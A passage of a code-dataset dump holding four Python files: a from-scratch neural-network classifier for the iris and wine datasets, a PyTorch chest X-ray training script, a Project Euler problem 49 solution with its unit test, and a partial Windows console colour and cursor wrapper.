HTML\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27190800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 14:32:38 2018\n\n@author: jmezi\n\"\"\"\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom matplotlib.pyplot import plot, show, figure\n\nlayer_number = int(input(\"How many hidden layers would you like? \"))\nnode_number = []\nfor i in range(layer_number):\n node_number.append(int(input(\"How many nodes would you like for layer \"+str(i+1)+\"? \")))\nlearning_rate = float(input(\"What would you like the learning rate to be? \"))\n\nclass Classifier():\n def __init__(self,layer_number,node_number,learning_rate):\n self.learning_rate = learning_rate\n self.layer_number = layer_number\n self.node_number = node_number\n self.layers = []\n for i in range(layer_number+1):\n self.layers.append(Layer(node_number[i] + 1,node_number[i+1]))\n \n def fit(self, train_data, train_target):\n wrong = 1\n accuracy = 0\n k = 0\n l = 0\n repeats = 0\n accuracy2 = 0\n old_rate = self.learning_rate\n accuracy_data = []\n while k < 1000 and accuracy < 0.95:\n wrong = 0\n for i in range(len(train_target)):\n correct_guess = []\n for j in range(len(set(train_target))):\n if j == train_target[i]:\n correct_guess.append(1)\n else:\n correct_guess.append(0)\n guess = self.generate_guess(train_data[i])\n guess_index = list(guess[-1]).index(max(list(guess[-1])))\n if guess_index != train_target[i]:\n wrong += 1\n guess.append(np.asarray(correct_guess))\n self.back_propagate(guess)\n k += 1\n accuracy = (len(train_target) - wrong) / len(train_target)\n accuracy_data.append(accuracy)\n if abs(accuracy2 - accuracy) < 1e-4:\n repeats += 1\n else:\n repeats = 0\n accuracy2 = accuracy\n if repeats > 150 and accuracy < 0.75:\n old_rate = self.learning_rate\n self.learning_rate *= (1-accuracy)*10\n l = k + 5\n repeats = 0\n if k > l and self.learning_rate > old_rate and repeats < 5:\n self.learning_rate /= 2\n print(k)\n return accuracy_data\n \n def predict(self,test_data):\n prediction_array = []\n for i in range(len(test_data)):\n guess = self.generate_guess(test_data[i])\n prediction_array.append(list(guess[-1]).index(max(list(guess[-1]))))\n return np.asarray(prediction_array)\n \n def generate_guess(self,data_input):\n guess = []\n guess.append(data_input)\n for i in range(self.layer_number+1):\n guess[-1] = np.append(guess[-1],-1)\n guess.append(self.layers[i].node_output(guess[-1]))\n return guess\n\n def back_propagate(self,guess):\n error = self.generate_error(guess)\n self.update_weights(error,guess)\n \n def generate_error(self,guess):\n error = []\n guess[0] = np.delete(guess[0],-1)\n for i in range(len(guess) - 2):\n if i == 0:\n error.append(guess[-2]*(1-guess[-2])*(guess[-2] - guess[-1]))\n else:\n guess[-(i+2)] = np.delete(guess[-(i+2)],-1)\n error.append(guess[-(i+2)]*(1-guess[-(i+2)])*np.sum(np.dot(self.layers[-i].weights.T,error[-1])))\n error = np.flip(error)\n return error\n \n def update_weights(self,error,guess):\n for i in range(len(self.layers)):\n self.layers[i].update_layer_weights(error[i],guess[i],self.learning_rate)\n \nclass Layer():\n def __init__(self,input_number,output_number):\n self.weights = np.random.randint(-50,50, size=(output_number,input_number))/100\n \n def node_output(self,node_input):\n return 1/(1 + np.exp(- np.matmul(self.weights,node_input)))\n \n def update_layer_weights(self,error,guess,learning_rate):\n for i in range(len(self.weights)):\n self.weights[i] = self.weights[i] - learning_rate * error[i] * np.append(guess,-1)\n\niris = datasets.load_iris()\ntrain_data, test_data, train_target, test_target = train_test_split(iris.data, iris.target, test_size = 0.3)\ntrain_data = np.asarray(train_data)\ntrain_target = np.asarray(train_target)\n\nfor i in range(4):\n train_data[i] = (train_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\n test_data[i] = (test_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\nnode_number.append(len(set(train_target)))\nnode_number.insert(0,len(train_data[0]))\nclassifier = Classifier(layer_number,node_number,learning_rate)\naccuracy_data = classifier.fit(train_data,train_target)\nprediction = classifier.predict(test_data)\n\nright = 0\ni = 0\nwhile i < len(prediction):\n if prediction[i] == test_target[i]:\n right += 1\n \n i += 1\n\npercent_right = right / len(test_target)\nprint(percent_right)\n\nfigure(1)\nplot(accuracy_data)\nshow()\n\nlayer_number = int(input(\"How many hidden layers would you like? \"))\nnode_number = []\nfor i in range(layer_number):\n node_number.append(int(input(\"How many nodes would you like for layer \"+str(i+1)+\"? \")))\nlearning_rate = float(input(\"What would you like the learning rate to be? \"))\n\nwine = datasets.load_wine()\ntrain_data, test_data, train_target, test_target = train_test_split(wine.data, wine.target, test_size = 0.3)\ntrain_data = np.asarray(train_data)\ntrain_target = np.asarray(train_target)\n\nfor i in range(4):\n train_data[i] = (train_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\n test_data[i] = (test_data[i] - np.mean(train_data[i]))/np.std(train_data[i])\nnode_number.append(len(set(train_target)))\nnode_number.insert(0,len(train_data[0]))\nclassifier = Classifier(layer_number,node_number,learning_rate)\naccuracy_data = classifier.fit(train_data,train_target)\nprediction = classifier.predict(test_data)\n\nright = 0\ni = 0\nwhile i < len(prediction):\n if prediction[i] == test_target[i]:\n right += 1\n \n i += 1\n\npercent_right = right / len(test_target)\nprint(percent_right)\n\nfigure(1)\nplot(accuracy_data)\nshow()\n","sub_path":"week06/prove7.py","file_name":"prove7.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"241417889","text":"from __future__ import print_function, division\nfrom saliency_map_net import SaliencyMapNet, SaliencyUNet, L_cut, Saliency_simple, Saliency_noskip, Saliency_encoder\n\nfrom data_loader import ChexRays, RSNA_loader\n\n\nimport torch\nfrom torch.optim import lr_scheduler\nimport numpy as np\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\nimport time\nimport os\nimport copy\nfrom apex import amp\nfrom sklearn.metrics import roc_auc_score\n\nfrom knoedl import setup_experiment\nfrom knoedl.utils import dynamic_import\n\n\ndef main():\n # amp_handle = amp.init(enabled=True)\n params = setup_experiment(exp_type='training')\n # get base_dir from params file\n base_dir = params['base_dir']\n # note params file has to be given in training/ edit_configuration top right drop down menu\n\n # init logging\n from knoedl.log.tb_log import TbLogger as knoedl_TbLogger\n\n # read param file containing training parameters\n running_type = params['running_type']\n num_classes = params['model_params']['num_classes']\n batch_size = params['train']['batch_size']\n epochs = params['train']['epochs']\n patience = params['train']['patience']\n\n data_transforms = {\n 'train': transforms.Compose([\n transforms.ToPILImage(),\n transforms.RandomHorizontalFlip(),\n transforms.RandomAffine(degrees=5, translate=(0.05, 0.05), scale=(0.9, 1.1)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n\n 'val': transforms.Compose([\n transforms.ToPILImage(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n }\n\n #### Data Location ####\n if running_type == 'dev':\n data_dir = 'data/hymenoptera_data'\n root_dir = '/media/data1/max_m/thesis/chexray_dev/'\n dev_folder = 'images/'\n dev_csv_path = os.path.join(root_dir, 'Dev_data.csv')\n log_dir = root_dir\n\n #### Datasets and Dataloaders Generation ####\n image_datasets = {x: ChexRays(csv_dir=root_dir + '{}.csv'.format(x),\n root_dir=root_dir,\n folder=dev_folder,\n transform=data_transforms[x]) # changed to none / data_transforms[x]\n for x in ['train', 'val']}\n elif running_type == 'normal':\n server = params['server']\n # if server == '95':\n # root_dir = '/media/data2/data/ChestXray14/small/data'\n # folder = 'images'\n # elif server =='99':\n # root_dir = '/media/data2/data/ChestXray-NIHCC'\n # folder = 'images/'\n\n csv_dir = '/media/data1/max_m/thesis/RSNA/csv_files/K_fold/unique_pids'\n root_dir = '/media/data2/data/rsna-pneumonia-detection-challenge'\n folder = 'train_images_med_png'\n log_dir = '/media/data1/max_m/logs'\n split_names = {'train': params['split_names'][0], 'val': params['split_names'][1]}\n\n image_datasets = {x: RSNA_loader(csv_dir=os.path.join(csv_dir, split_names[x]),\n root_dir=root_dir,\n folder=folder,\n num_classes=num_classes,\n transform=data_transforms[x]) # changed to none / data_transforms[x]\n for x in ['train', 'val']}\n\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=batch_size,\n shuffle=True,\n num_workers=4) for x in ['train', 'val']}\n\n # check if datasets contain the same classes\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\n\n class_names = {x: image_datasets[x].classes for x in ['train', 'val']}\n assert class_names['train'] == class_names[\n 'val'], 'validation set does not contain the same classes as training set.' \\\n 'validation classes = {}, training classes = {}' \\\n .format(class_names['train'], class_names['val'])\n\n\n #### device assignment ####\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n #### model instantiation, based on architecture mode ####\n model_mode = params['model_params']['model_mode']\n if model_mode == 'saliency':\n # from saliency_map_net import SaliencyMapNet\n model = SaliencyMapNet(num_classes=num_classes,\n gr=32,\n resnet_backbone='ResNet50',\n dense_config='normal')\n elif model_mode == 'unet':\n model = SaliencyUNet(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'cut':\n model = L_cut(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif 'simple' in model_mode:\n if '1' in model_mode:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50', mode='mode1')\n elif '2' in model_mode:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50', mode='mode2')\n else:\n model = Saliency_simple(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'noskip':\n model = Saliency_noskip(num_classes=num_classes,\n resnet_backbone='ResNet50')\n elif model_mode == 'encoder':\n model = Saliency_encoder(num_classes=num_classes,\n resnet_backbone='ResNet50')\n model = model.to(device)\n\n #### training ####\n # when training on RSNA use softmax and NLLLoss\n loss_type = dynamic_import(['torch.nn'], params['train']['loss_type'], 'loss')\n loss = loss_type(**params['train']['loss_params'])\n\n optim_type = dynamic_import(['torch.optim'], params['train']['optim_type'], 'optimizer')\n optim = optim_type(model.parameters(), **params['train']['optim_params'])\n\n\n # APEX init\n model, optim = amp.initialize(model, optim, opt_level='O1')\n step_size = params['train']['lr_decay']\n gamma = params['train']['gamma']\n exp_lr_scheduler = lr_scheduler.StepLR(optim, step_size=step_size, gamma=gamma)\n\n\n #### Initialize model savers and tensorboard logging.####\n # Note that knoedl automatically creates logs for all .py files, and the console log and knoedl version\n knoedl_tb_logger = knoedl_TbLogger(base_dir, count_steps=True)\n\n #create a models directory in the base_dir that is created by knoedl\n # models_dir is used to save the best models, and a model from each epoch\n models_dir = os.path.join(base_dir, 'models/')\n os.makedirs(models_dir, exist_ok=True)\n\n #### load model params from previous training ####\n load_pretrained = params['load_pretrained']\n best_dir = params['best_dir']\n best_from = os.path.join(log_dir, best_dir)\n if load_pretrained:\n checkpoint = torch.load(best_from)\n model.load_state_dict(checkpoint['model_state_dict'], strict=False)\n # optim.load_state_dict(checkpoint['optimizer_state_dict'])\n\n ## freeze weights:\n # for child in model.pretrained_resnet.children():\n # for param in child.parameters():\n # param.requires_grad = False\n\n # model.eval()\n # - or -\n model.train()\n\n # todo : debugging training\n result = train_model(model,\n loss,\n optim,\n scheduler=exp_lr_scheduler,\n patience=patience,\n device=device,\n dataloaders=dataloaders,\n class_names=class_names,\n dataset_sizes=dataset_sizes,\n root_dir=root_dir,\n epochs=epochs,\n knoedl_tb_logger=knoedl_tb_logger,\n log_dir=models_dir,\n params=params)\n\n # visualize_model(model, dataloaders, device, class_names, num_images=4)\n\n return result\n\n\ndef show(tensor, title=None, save_location=None):\n inp = tensor.numpy().transpose((1, 2, 0))\n mean = np.array([0.485, 0.456, 0.406])\n std = np.array([0.229, 0.224, 0.225])\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n plt.imshow(inp)\n if title is not None:\n plt.title(title)\n\n if save_location is not None:\n save_loc = os.path.join('/media/data1/max_m/thesis/saved_figures/', save_location) #uncomment if image is to be saved\n plt.savefig(save_loc)\n else:\n plt.pause(0.001) # comment out if image is to be saved\n\n\n#todo: transform list of labels into one hot encoding, add this to ChexRay as a class method\ndef convert_labels_to_tensor(class_names, sample):\n labels_dict = {label: idx for idx, label in enumerate(class_names['train'])}\n predictions = sample['annotations']['Finding Labels']\n # convert sample labels to list of labels\n\n idx = []\n batch_size = sample['image'].shape[0]\n num_classes = len(class_names['train'])\n one_hot = torch.zeros((batch_size, num_classes))\n for batch in range(batch_size):\n idx = []\n if isinstance(predictions[batch], str):\n predictions[batch] = [predictions[batch]]\n for i, label in enumerate(predictions[batch]):\n idx.append(labels_dict[label])\n\n one_hot[batch, idx] = 1\n return one_hot\n\n\n## TOdo: start a training with basic parameters, little data augmentation etc. % done\n# define training function\ndef train_model(model,\n criterion,\n optimizer,\n scheduler,\n patience,\n device,\n dataloaders,\n class_names,\n dataset_sizes,\n root_dir,\n knoedl_tb_logger,\n epochs,\n log_dir,\n params,\n ):\n since = time.time()\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n best_roc_auc = 0.0\n\n\n with knoedl_tb_logger:\n for epoch in range(0, epochs):\n print('Epoch {}/{}'.format(epoch, epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n # update learning_rate scheduler:\n scheduler.step()\n\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n counter = 0\n\n if phase == 'val':\n labels_epoch = []\n outs_epoch = []\n\n # running_roc_auc_score = 0.0\n # running_add = 0.0\n ## use a array to save the outputs\n\n # Iterate over data.\n if phase == 'val':\n print('Wait !')\n for i, sample in enumerate(dataloaders[phase]):\n inputs = sample['image'].to(device)\n\n # formatting labels, where multiple labels are present, create a list\n # for roc auc score required in one hot labels\n labels = sample['annotations'].squeeze()\n #convert labels to int encoding if loss function is CrossEntropyLoss\n if len(labels.shape) == 2:\n labels_int = labels.max(1)[1]\n else:\n labels_int = labels.max()\n\n\n labels = labels.to(device)\n labels_int = labels_int.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n _, outputs = model(inputs)\n #change labels passed to loss if BCELoss or NLLLoss\n if params['train']['loss_type'] == 'NLLLoss':\n labels = labels.type(dtype=torch.long)\n if labels_int.dim() != 0:\n loss = criterion(outputs, labels_int) # assumes that labels are given as one hot encoded\n else:\n labels_int = labels_int.unsqueeze(0).type(dtype=torch.long)\n loss = criterion(outputs, labels_int)\n else:\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n\n optimizer.step()\n\n if phase == 'val':\n # append outputs and labels of batch to overall cached outputs and labels of epoch\n with torch.no_grad():\n outs_epoch.append(outputs.cpu().numpy())\n # if BCELoss, labels are one hot encoded\n labels_epoch.append(labels.cpu().numpy())\n\n # logging...\n if i % 100 == 0:\n if phase =='val':\n print('current i is: {}/{} \\n'\n ' current loss is {} \\n'.format(i,\n len(dataloaders[phase].dataset)/\n dataloaders[phase].batch_size,\n loss.item(),))\n else:\n print('current i is: {}/{} \\n'\n ' current loss is {}'.format(i,\n len(dataloaders[phase].dataset)/\n dataloaders[phase].batch_size,\n loss.item()))\n running_loss += loss.item() * inputs.size(0)\n\n #calculate loss\n epoch_loss = running_loss / dataset_sizes[phase]\n\n # write TensorBoard output...\n if phase == 'val':\n # save predicted classes for statistics\n outs_epoch = np.concatenate(outs_epoch, axis=0)\n labels_epoch = np.concatenate(labels_epoch, axis=0)\n\n roc_auc = roc_auc_score(y_true=labels_epoch, y_score=outs_epoch, average=\"macro\")\n\n if model.pooling.beta.shape[0] == 3:\n current_lr = optimizer.param_groups[0]['lr']\n res_list = [model.pooling.beta[0], model.pooling.beta[1], model.pooling.beta[2], current_lr, epoch, epoch_loss, roc_auc]\n tb_tags = ['beta0', 'beta1', 'beta2', 'lr', 'epoch', 'val_epoch_loss', 'roc_auc']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f} roc_auc: {:.4f}'.format(\n phase, epoch_loss, roc_auc))\n else:\n current_lr = optimizer.param_groups[0]['lr']\n res_list = [model.pooling.beta, current_lr, epoch, epoch_loss, roc_auc]\n tb_tags = ['beta0', 'lr', 'epoch', 'val_epoch_loss', 'roc_auc']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f} roc_auc: {:.4f}'.format(\n phase, epoch_loss, roc_auc))\n\n elif phase == 'train':\n res_list = [epoch, epoch_loss]\n tb_tags = ['epoch', 'train_epoch_loss']\n knoedl_tb_logger.add_scalars(tb_tags, res_list, step=epoch)\n print('{} Loss: {:.4f}'.format(\n phase, epoch_loss))\n\n\n if roc_auc > best_roc_auc:\n best_roc_auc = roc_auc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n # save model weights to file\n save_at = os.path.join(log_dir, 'checkpoint{}_{}.pth.tar'.format(epoch, phase))\n # torch.save(model.state_dict(), save_at)\n\n # save more checkpoints\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, save_at)\n\n counter = 0\n else:\n counter += 1\n\n if counter >= patience:\n break\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best roc_auc: {:4f}'.format(best_roc_auc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n save_best = os.path.join(log_dir, 'best.pth.tar')\n\n # save the best model\n torch.save({\n 'epoch': epoch,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, save_best)\n\n return model\n\nif __name__ == '__main__':\n main()\n\nprint('done')\n\n\n","sub_path":"classification_training.py","file_name":"classification_training.py","file_ext":"py","file_size_in_byte":18072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"410368410","text":"#! /usr/bin/env python3\n\n# Problem 49 - Prime permutations\n#\n# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms\n# increases by 3330, is unusual in two ways: (i) each of the three terms\n# are prime, and, (ii) each of the 4-digit numbers are permutations of one\n# another.\n#\n# There are no arithmetic sequences made up of three 1-, 2-, or 3-digit\n# primes, exhibiting this property, but there is one other 4-digit increasing\n# sequence.\n#\n# What 12-digit number do you form by concatenating the three terms in this\n# sequence?\n\nimport unittest\n\nfrom util import *\n\ndef longestPrimePermSeq(digits):\n allPrimePerms = primePerms(digits)\n maxSeqLen, maxSeqs = 0, []\n for p, ps in allPrimePerms.items():\n index = seqToDict(ps)\n a = ps[0]\n for b in ps[1:]:\n d = b - a\n it = a\n seq = [it]\n while it + d in index:\n seq.append(it + d)\n it = ps[index[it + d]]\n if len(seq) == maxSeqLen:\n maxSeqs.append(seq)\n if len(seq) > maxSeqLen:\n maxSeqLen = len(seq)\n maxSeqs = [seq]\n return maxSeqs\n\ndef primePerms(digits):\n limit = int('9' * digits)\n primeList = [p for p in primes(limit) if numDigits(p) == digits]\n primeSet = set(primeList)\n\n allPerms = {}\n for i, p in enumerate(primeList):\n allPerms[p] = set()\n for perm in perms(intToSeq(p)):\n q = seqToInt(perm)\n if q in primeSet and q >= p:\n allPerms[p].add(q)\n allPerms[p] = sorted(allPerms[p])\n return allPerms\n\ndef seqToDict(seq):\n index = {}\n for i, n in enumerate(seq):\n index[n] = i\n return index\n\nclass Test(unittest.TestCase):\n def test_problem049(self):\n seqs = sorted([seqToInt(seq) for seq in longestPrimePermSeq(4)])\n self.assertEqual(seqs, [148748178147, 296962999629])\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"problem049.py","file_name":"problem049.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4479483","text":"#\n# Console.py\n# Advanced console capabilites on Windows\n#\n# Jonatan H Sundqvist\n# July 30 2014\n#\n\n# TODO | - Look for portable solutions, dependency checks (cf. curses)\n#\t\t - Decide on API argument scheme (X, Y, tuple, complex, either or, etc)\n#\t\t \t-- Decorator for overloads (?)\n#\t\t - Proper Unicode handling, encoding queries\n#\t\t - Saving output\n#\t\t - Sort methods in a logical order (High-level API, Low-level API, internal methods, auxiliary internal methods, etc.)\n#\t\t - Position printing (printAt, fill, etc.)\n\n# SPEC | - \n#\t\t -\n\n\nimport tkinter as tk\n\nfrom ctypes import *\nfrom itertools import cycle, takewhile\n\nfrom sys import stdout\nfrom time import sleep\nfrom random import choice\nfrom collections import namedtuple\n\nif __name__ == '__main__':\n\tfrom WinTypes import *\nelse:\n\tfrom SwiftUtils.WinTypes import *\t# (?) # TODO: Fix import error (different behaviour when including this module from another script) (✓)\n# from constants import * \t# (?)\n\n\nclass Colours:\n\tBLACK \t= 0x0\n\tBLUE \t= 0x1\n\tGREEN \t= 0x2\n\tCYAN \t= 0x3\n\tBLOOD \t= 0x4\n\tPURPLE \t= 0x5\n\tGOLD \t= 0x6\n\tBONE \t= 0x7\n\tGREY \t= 0x8\n\tOCEAN \t= 0x9\n\tGRASS \t= 0xA\n\tLAGOON \t= 0xB\n\tRED \t= 0xC\n\tPINK \t= 0xD\n\tYELLOW \t= 0xE\n\tWHITE \t= 0xF\n\n\nclass Console():\n\n\t'''\n\tWraps the console API for Windows,\n\tproviding a simple interface for \n\tadvanced text-based interaction.\n\n\t'''\n\n\tdef __init__(self):\n\n\t\t''' '''\n\n\t\t# Acquire handle\n\t\twindll.Kernel32.GetStdHandle.restype = c_ulong\n\t\tself.HANDLE = c_ulong(0XFFFFFFF5)\n\t\tself.hStdout = windll.Kernel32.GetStdHandle(self.HANDLE)\n\n\t\t# Initialize\n\t\tself.title('Labyrinthian')\n\n\t\t# Initialize colours\n\t\tself.bg = 0x00 # Highest bits indicate bg?\n\t\tself.fg = 0x00 # Lowest bits indicate fg?\n\n\t\t# Initialize buffer attributes\n\t\t# TODO: Cursor object (eg. pos, visible, etc.) (?)\n\t\tself.size \t= None # Buffer size (in characters)\n\t\tself.pos \t= 0, 0 # Cursor position (character offset from top left corner)\n\n\t\tself.updateBufferInfo()\n\n\n\tdef colour(self, bg=None, fg=None):\n\n\t\t''' Returns or sets foreground and background colour '''\n\n\t\tif (bg is None) and (fg is None):\n\t\t\treturn (self.bg << 4) + (self.fg)\n\t\t\n\t\tif bg is not None:\n\t\t\tassert isinstance(bg, int) and (0x0 <= bg <= 0xF)\n\t\t\tself.bg = bg\n\t\t\n\t\tif fg is not None:\n\t\t\tassert isinstance(fg, int) and (0x0 <= fg <= 0xF)\n\t\t\tself.fg = fg\n\n\t\twindll.Kernel32.SetConsoleTextAttribute(self.hStdout, (self.bg << 4) + (self.fg))\n\n\n\tdef cursor(self, x=None, y=None):\n\n\t\t''' Sets or retrieves the cursor position '''\n\n\t\tself.updateBufferInfo()\n\t\tstdout.flush()\n\t\t#print('X: %d\\n%sY: %d' % (self.pos[0], ' ' * (self.pos[0]), self.pos[1]))\n\t\t\n\t\tif x is None and y is None:\n\t\t\t# TODO: Make sure self.pos is up to date (cf. print)\n\t\t\treturn self.pos\n\n\t\tif x is not None:\n\t\t\tself.pos = x, self.pos[1]\n\n\t\tif y is not None:\n\t\t\tself.pos = self.pos[0], y\n\n\t\twindll.Kernel32.SetConsoleCursorPosition(self.hStdout, COORD(*self.pos))\n\n\n\tdef charAt(self, X, Y, char=None, bg=None, fg=None):\n\n\t\t''' Sets or retrieves the character at the specified position '''\n\n\t\t# TODO: Retrieve colour data as well (cf. CHAR_INFO)\n\t\tif char is None:\n\t\t\treturn 0 # Char at X,Y\n\t\telse:\n\t\t\traise NotImplementedError # Set char at X, Y\n\n\n\tdef view(self, section, contents=None, bg=None, fg=None):\n\n\t\t''' Sets or retrieves a rectangular section of the console buffer '''\n\n\t\traise NotImplementedError\n\n\n\tdef updateBufferInfo(self):\n\n\t\t''' '''\n\n\t\tinfo = BUFFERINFO()\n\t\twindll.Kernel32.GetConsoleScreenBufferInfo(self.hStdout, byref(info)) # TODO: Make sure this is correct\n\t\t\n\t\tself.pos \t= (info.dwCursorPosition.X, info.dwCursorPosition.Y)\n\t\tassert self.pos == (info.dwCursorPosition.X, info.dwCursorPosition.Y)\n\t\tself.size \t= info.dwSize.X, info.dwSize.Y\n\n\n\tdef pullEvent(self):\n\n\t\t''' '''\n\n\t\traise NotImplementedError\n\n\t\tnumEvents = DWORD(0)\n\t\twindll.Kernel32.GetNumberOfConsoleInputEvents(self.hStdout, byref(numEvents))\n\t\trecord = INPUT_RECORD()\n\t\tlength = DWORD(1)\n\t\twindll.Kernel32.GetConsoleScreenBufferInfo(self.hStdout)\n\n\n\tdef title(self, title=None):\n\n\t\t''' Returns or sets title '''\n\n\t\tif title is None:\n\t\t\treturn self.title\n\t\telse:\n\t\t\tself.title = title\n\t\t\twindll.Kernel32.SetConsoleTitleW(title)\n\n\n\tdef moveCursor(self, x, y):\n\n\t\t''' Moves the cursor relative to its current position '''\n\n\t\tself.cursor(x+self.pos[0], y+self.pos[1])\n\n\n\tdef putTokens(self, *tokens):\n\n\t\t''' '''\n\n\t\tfor token in tokens:\n\t\t\tif isinstance(token, str):\n\t\t\t\tprint(token, end=' ')\n\t\t\telse:\n\t\t\t\tstdout.flush() # Have to flush the buffer for the colour change to take effect. Printing a newline also works.\n\t\t\t\tself.colour(fg=token)\n\n\n\tdef colourPrint(self, string):\n\t\ttokens = [word if not hasattr(Colours, word) else getattr(Colours, word) for word in string.split()]\n\t\tself.putTokens(*tokens)\n\n\n\tdef parseMarkup(self, markup):\n\n\t\t''' '''\n\n\t\t# TODO: Parse markup\n\t\t# TODO: Escapes for syntactic characters\n\t\t# TODO: Default formatting for plain text\n\t\t# TODO: Debugging, error handling\n\t\t# TODO: Optimise, extract setup code (eg. definitions)\n\t\t# TODO: Use regex or library (?)\n\t\t# NOTE: Nested tags are currently not supported\n\t\t\n\t\tToken = namedtuple('Token', 'fg bg text')\n\t\ttokens = []\n\n\t\t# Default values for attributes\n\t\tdefaults = {\n\t\t\t'fg': 'WHITE',\n\t\t\t'bg': 'BLACK'\n\t\t}\n\n\t\tdef colour(prop, frmt):\n\t\t\t''' '''\n\t\t\t# TODO: Find a more general name (eg. parseAttributes)\n\t\t\t# TODO: Allow customisation via kwargs (?)\n\t\t\tif prop not in frmt:\n\t\t\t\treturn defaults[prop]\n\t\t\telse:\n\t\t\t\t# TODO: Use colour aliases when printing tokens (?)\n\t\t\t\t# TODO: More attributes (...)\n\t\t\t\t# This sub-parser only consumes upper-case letters (since it's trying to extract a Colour constant)\n\t\t\t\t#return getattr(Colours, ''.join(takewhile(lambda c: c.isupper(), frmt[frmt.index(prop)+3:])))\n\t\t\t\t# This generalised sub-parser extracts ANY value token and leaves the interpretation to the caller\n\t\t\t\t# NOTE: Assumes the delimiter is a space. Easily customised.\n\t\t\t\treturn ''.join(takewhile(lambda c: c not in ' >', frmt[frmt.index(prop)+3:]))\n\n\t\t\n\t\twhile len(markup) > 0:\n\t\t\tif markup.startswith('<'):\n\t\t\t\tbegin \t= markup.index('<') # Should always be 0 within this branch\n\t\t\t\tend \t= markup.index('>') # Last index of formatting tag\n\t\t\t\tfrmt \t= markup[begin+1:end]\n\n\t\t\t\tclose \t= end + 1 + markup[end+1:].index('') # Skip formatting tag when looking for closing tag (unnecessary optimization (?))\n\t\t\t\ttext \t= markup[end+1:close]\t\t\t\t\t# Extract text between formatting tag and end tag\n\n\t\t\t\tmarkup = markup[close+len(''):] # Increment the pointer (so to speak)\n\n\t\t\t\t# TODO: Use takeWhile or regex (?)\n\t\t\t\t#fg = Colours.WHITE if 'fg=' not in frmt else getattr(Colours, frmt[]) # TODO: Allow hex colours too (?)\n\t\t\t\t#bg = Colours.BLACK if 'bg=' not in frmt else getattr(Colours, frmt[frmt.index('bg=')+3:(frmt[frmt.index('bg=')+3:].index())])\n\t\t\t\tfg = colour('fg', frmt)\n\t\t\t\tbg = colour('bg', frmt)\n\t\t\t\ttokens.append(Token(fg, bg, text))\n\t\t\telse:\n\t\t\t\t# Token does not have tags\n\t\t\t\tend = markup.index('<') if '<' in markup else len(markup)\n\t\t\t\ttokens.append(Token(defaults['fg'], defaults['bg'], markup[:end]))\n\t\t\t\tmarkup = markup[end:]\n\n\t\treturn tokens\n\t\t#return 'Hello thereThis is white text. IMPORTANT!'\n\n\n\tdef printMarkup(self, markup):\n\t\t\n\t\t''' '''\n\t\t# NOTE: Currently incompatible with customised markup\n\t\tfor token in self.parseMarkup(markup):\n\t\t\tself.putColoured(char=token.text, fg=getattr(Colours, token.fg), bg=getattr(Colours,token.bg))\n\n\t\t# TODO: Reset formatting afterwards (?)\n\n\n\tdef putColoured(self, char, fg=None, bg=None):\n\t\t''' Prints a coloured string '''\n\t\t# TODO: Rename char argument\n\t\tstdout.flush()\n\t\tself.colour(bg=bg, fg=fg)\n\t\tprint(char, end='')\n\t\tstdout.flush()\n\n\n\ndef main():\n\n\tconsole = Console()\n\n\tconsole.colourPrint('RED ERROR! WHITE ! Two minutes to self destruction.')\n\tprint()\n\tconsole.colourPrint('Evacuate GREEN premises WHITE immediately!')\n\t\n\t#print(('#'*20+'\\n')*20)\n\t#x = console.cursor(6,5)\n\t#print('█')\n\t#x = console.cursor(6,6)\n\t#print('█')\n\n\tprint()\n\n\tmaze = [\n\t\t'███████████████████████████████',\n\t\t'█ █ 